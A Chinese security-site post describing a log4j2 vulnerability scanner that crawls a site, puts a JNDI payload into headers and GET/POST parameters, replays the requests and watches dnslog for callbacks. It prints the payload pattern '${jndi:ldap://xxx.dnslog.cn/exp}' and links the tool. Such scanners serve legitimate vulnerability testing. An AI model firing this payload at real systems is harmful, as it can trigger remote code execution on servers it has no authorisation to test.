标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3063]   作者: banana 发表于: [2022-04-06]

本文共 [213] 位读者顶过

  1. 程序的工作流是利用rad爬取网站所有链接 [出自:jiwo.org]

    • 自动适配操作系统下载rad程序

  2. 替换值为log4j2漏洞的payload

    • 更改请求中refer、agent值为payload

    • 更改GET型请求中'='号后的值为payload;

    • 更改POST型请求中data数据包中'=''、':'(json格式)后的值为payload

  3. 将替换好的请求进行重放。

    • 如未定义payload, 脚本将自动从dnglog获取并定义未${jndi:ldap://xxx.dnslog.cn/exp}

    • 如果是采用默认的dnslog为接收站点,那么将每重放十次检测一次dnslog。(考虑dnslog请求太多会被封禁)

    • 如自定义接收站点,将不进行检测。

运行参数

  • 需要注意的是,必须安装有chrome才可以运行,不支持firefox等。 如chrome不是默认位置,须在rad_config.yml文件中指定chrome路径。

  • payload值默认自动从dnslog获取,但是因平台问题无法访问时,程序会提示错误。用户可以自定义其他站点或ip,如http://ceye.io/

  • 工具地址

    https://github.com/zongdeiqianxing/log4j2-scan

评论

暂无
发表评论
 返回顶部 
热度(213)
 关注微信